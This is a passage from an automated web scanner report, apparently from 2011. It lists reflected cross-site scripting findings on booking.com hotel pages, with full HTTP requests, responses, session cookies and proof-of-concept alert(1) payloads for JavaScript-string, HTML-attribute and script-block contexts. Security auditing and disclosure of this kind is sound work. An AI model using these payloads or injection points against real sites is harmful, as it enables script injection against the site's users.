Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:52 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55612
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotel/usc6994"><script>alert(1)</script>e9338c63c3f/c-boston-massachusettes.html" />
...[SNIP]...

4.166. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5c4c'%3balert(1)//e6bb002832a was submitted in the REST URL parameter 3. This input was echoed as f5c4c';alert(1)//e6bb002832a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.htmlf5c4c'%3balert(1)//e6bb002832a?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:17:02 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGHIh9BErcQ1%2FkrlZ%2F9oDW%2FyEe48HaesU3wI%2BbzIHxfznE769fiF%2FCbsJ%2FzBHHyNu%2BqPjHkeCqhSqKzvlA8dk%2BQY%2FzuhXkWC5jbQPlecoXiOU35n6HKiYTUUarDZZPFteBVsLhORH8gt2ij9WdRS81UtxYJbZWXX3yoxQ6UtIlMT3D3N%2BLnfzDXeDvXGpJB%2B%2FgS%2BFDtlpTsB%2FIXCt6kncPlpG6DxDYnjZf7mmbvqmA%2BpUc8zaU45L2k2resNOe9wjE8SsbQd6oQ1bkdwFaEwBlzQUE9foKtudJ0IdM%2ByaOCN1FiyAWhge%2BzZVTPWeNiMtRvr2ipw8hteSuByZzbb%2BhjkMzYU3uzRivXXiZ%2BnBiQAzTYc1r87b37LJifna%2B3fUzDPKGqOjrgK3UfIzibE08fwjHT5vB2gRAZhdKyoS%2BywwIdMOxiYfaAev99ZfubNnezo8oWzzXT%2Foon54JHNRzi9sZGgl3LW8tjiuSiUslX6M2%2BQv7TfUh4X2QFerhpx5aP6QSLziWIyqr4DVU75oAy0e4AN1ZlqRCDYp09SnuS9M1%2FWlVdG9uafeOkB1Knu%2FQdc10Tr9PhKKRDa6tTDkDEKVtAatN6fezvq73FH%2FIf7bfGNHjkoAoxZEILFIh6ZZF9dw7cJKD4r7LoFvrlIcuMSSYIWXi3b%2FT93rE2Op4Sya3evnIadIB0W%2BMZKR%2F8zCY6uo6WQLphosid4r0mmLVcNxRZuuXbj%2FQ8CTJ8F9vnaIRmxpux%2BS2ZnY6Fgcwy%2FJotMELa0stQnIZ9Q%2Fbse4d%2FBIciiqnqWavRL6OPjGXmvxKMX5KG2rPrnZT28MN0dEaQaWI3yGGXIb%2BE2Y9JZkhw76LfCxIwqyIoj%2B57lYJ2GtwlFHgM7uhQYCtczPibCsB6TB%2FDAnI2%2B8TnlfF3o8PveyfHUktjntIFNY7d0hR%2FsmCBRuqRRsPi6k9DttC73hlLheP7Atz5OlxIf98lMJG%2FuZJeVNKCyj7SjcI96zzuJ8xsvgoHzTvO%2FasP6BfGrxdAH0TSqjH5BbUQkGe7IpSGBe3gf6wTER%2BnXskp%2FSdvn9M9R9PMuJeQBIpPqudvD6ksIU548FqjwjKHcGEeoeo4%2FN4NRIWieQE0rbnlskfvDsjr7WxN%2Be1h%2FzV8wch0GbWx6fvaW4eosdokHLy3QLP9tqwULH6fWfxwcSSJcRhUjC8PCYShh6MEu8syi7SWiFDZvE%2BMzKj9k3wrOpF3UBMfRBOO5VC1PndOdnzwTJmKIyB9FMd3q7THgF7Nl1xahrFq%2FB1MO47ALc13oHqLQ9sbpQ9HJGTzHKVi3OR7aiBmxRl9kWxkBMHp9ePLKSJid4lXI2synxSn9Hx4kCqIZd3UQ%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:17:02 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55537
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.htmlf5c4c';alert(1)//e6bb002832a?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'R
...[SNIP]...

4.167. http://www.booking.com/hotel/us/c-boston-massachusettes.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c9d3"><script>alert(1)</script>a89d45ffd1e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html5c9d3"><script>alert(1)</script>a89d45ffd1e?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 01:16:59 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGHIh9BErcQ1%2FkrlZ%2F9oDW%2FyEe48HaesU3wI%2BbzIHxfznE769fiF%2FCbsJ%2FzBHHyNu%2BqPjHkeCqhSqKzvlA8dk%2BQY%2FzuhXkWC5jbQPlecoXiOU35n6HKiYTUUarDZZPFteBVsLhORH8gt2ij9WdRS81UtxYJbZWXX3yoxQ6UtIlMT3D3N%2BLnfzDXeDvXGpJB%2B%2FgS%2BFDtlpTsB%2FIXCt6kncPlpG6DxDYnjZf7mmbvqmA%2BpUc8zaU45L2k2resNOe9wjE8SsbQd6oQ1bkdwFaEwBlzQUE9foKtudJ0IdM%2ByaOCN1FiyAWhge%2BzZVTPWeNiMtRvr2ipw8hteSuByZzbb%2BhjkMzYU3uzRivXXiZ%2BnBiQAzTYc1r87b37LJifna%2B3fUzDPKGqOjrgK3UfIzibE08fwjHT5vB2gRAZhdKyoS%2BywwIdMOxiYfaAev99ZfubNnezo8oWzzXT%2Foon54JHNRzi9sZGgl3LW8tjiuSiUslX6M2%2BQv7TfUh4X2QFerhpx5aP6QSLziWIyqr4DVU75oAy0e4AN1ZlqRCDYp09SnuS9M1%2FWlVdG9uafeOkB1Knu%2FQdc10Tr9PhKKRDa6tTDkDEKVtAatN6fezvq73FH%2FIf7bfGNHjkoAoxZEILFIh6ZZF9dw7cJKD4r7LoFvrlIcuMSSYIWXi3b%2FT93rE2Op4Sya3evnIadIB0W%2BMZKR%2F8zCY6uo6WQLphosid4r0mmLVcNxRZuuXbj%2FQ8CTJ8F9vnaIRmxpux%2BS2ZnY6Fgcwy%2FJotMELa0stQnIZ9Q%2Fbse4d%2FBIciiqnqWavRL6OPjGXmvxKMX5KG2rPrnZT28MN0dEaQaWI3yGGXIb%2BE2Y9JZkhw76LfCxIwqyIoj%2B57lYJ2GtwlFHgM7uhQYCtczPibCsB6TB%2FDAnI2%2B8TnlfF3o8PveyfHUktjntIFNY7d0hR%2FsmCBRuqRRsPi6k9DttC73hlLheP7Atz5OlxIf98lMJG%2FuZJeVNKCyj7SjcI96zzuJ8xsvgoHzTvO%2FasP6BfGrxdAH0TSqjH5BbUQkGe7IpSGBe3gf6wTER%2BnXskp%2FSdvn9M9R9PMuJeQBIpPqudvD6ksIU548FqjwjKHcGEeoeo4%2FN4NRIWieQE0rbnlskfvDsjr7WxN%2Be1h%2FzV8wch0GbWx6fvaW4eosdokHLy3QLP9tqwULH6fWfxwcSSJcRhUjC8PCYShh6MEu8syi7SWiFDvaIVgA5BfeSy2UWOh8LZcsW3jRnqrEt5L5VvgL6yB67t6sby%2Frlgcz4bVLGz3RhdvNdc8%2FQ9kXtQ%2BfDSp63ux4asp6TQnVYUrU1Xhansf%2BKObojl%2Bi1aHA%2BDyO1osiIAB45KYAq4BulQjgvQL1Gg%2Fg%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:16:59 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55612
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotel/us/c-boston-massachusettes.html5c9d3"><script>alert(1)</script>a89d45ffd1e" />
...[SNIP]...

4.168. http://www.booking.com/hotel/us/c-boston-massachusettes.html [aid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1797e</script><script>alert(1)</script>a62ba1e608e was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=3238041797e</script><script>alert(1)</script>a62ba1e608e&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:11:39 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdYNcX2CBa26JnwhiZtnPf7CTU4Xq874S7cKvMNITsisTkZBKlazkRsQ4mh19Qvn5AJXh%2Fp1wiOeiPMeJbQUxkSGN5%2FV4%2FAHSVB7IHBrlugF36lNfV8gSdmQvTYooCEmZAxx3pnyomeugtYa1%2BYzrNSI9BqaUXmwvvk7nKxGK8j8CHyUfGApe%2FX3DiKcjzsCtPHQJvfVs8K3zebLDTjtD9s%2Fh4B6AWeSkOhJPAU9PEvNcqB5MiIqEbRDloelJLdfvAvkT4Q2Ja3jzI7vPUc8T2Hi5Q5HQ5qTEuD5AB%2B7GUYNpUraKpRTGjdQG7dHzo1ICMah34TMooX2PdhHz%2FvXN%2B6Ff6BHglaX1t8XytIqCD5x6cwrxf5UITAoVX0IPUrwX3srzm9lmAg0Zxq3n%2BkVI%2Fq5CUFxGXZFVGpPvm4g6rcqQMFtosOaezHfE76EzvlOnks0xva9PuWZbS19muiyZKDXwAI%2BsygaYXf5oe38lZtISUm1WTLvq70Wz%2B7GaqseUzwdL1maVJnzwHRH2tS9o3vE2WvXVLhDdmuXVPtJ9ZtBMo3HcODmUm%2Fv26T3pxvjVXp%2FAkKkUrNQeCdDVi3LfsEvgN5fqdNRLlufUTO3jEuJP3n0PwqbB5xfNtPCfnZfLQrakhc0%2BtpEYPYLe8VzCaGP%2BBdOM1STJEwYtJnlxGrVtshNaUS3nRnTYaiTdsEir4sy9x%2FwMudYqhMO1nHviBcnNIX5fgA9sDgM4q0pGczHj0t97TCurvu3DeVEm83FZeM62LjCcwMR80HzTPsbFBGsK1lbZxYaF4vaCWO%2FwA1D68gQ2kM9nGtROALbCtqPznoC22OjM2mL5cjMJuCuDDose%2F%2F7aOJXY8pCHq1fexIqqssbWUfmy5NTaIIvEip7k7O9Ui3gQhzFd1HSqmYfilcjsCdTkLVVkzAxdBakqSTn%2FlpYkFfSak8dNqiNIgfcFInmijc6%2BugbSC%2BptoAkWxRuEP%2BtLEfDhj0eLm3%2F%2B9iAwIIUg69kS01qdO2cmepWWUd5VWrVgUQo5Oskmz2OOe8QXbLo4QZrtcvYtuZij%2FzrL3drCCeJN5t5QxoSxCAPrNte8cKI6YB2Z6LRx3aPukOsIGxC0H4pF9Wz5JMbHWYfoKJlt%2Bnj7HA6EUvj%2BSCe2u11ibmk%2FzAKtjwPYSXm7yAyXzJXmrW8l9RqBtdOAIEsaQSY8IZ%2FP48AL6yQnE0KFtSDhXo9RX6cN%2BW6aUnrDAthwouXQswTfsJpGhX2v0QcCsZXBexcJJphcSuej3fFDV6O93mjPE3HNhPDeRJ8LP5m3hbM%2BrMJ%2B04d6E7QpUjdHK3aQHSZR%2FlrOrDFOiI6KmFYYUOQ%2FZidzZ0xPNm6PmA%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:11:39 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 228648
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ag_to_suggest" : 'us',
"b_fb_id" : 'FB_text',
locale_for_facebook : 'en_US',
b_domain_end : '.booking.com',
b_original_url : 'http://www.booking.com/hotel/us/c-boston-massachusettes.html?aid=3238041797e</script><script>alert(1)</script>a62ba1e608e&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_
...[SNIP]...

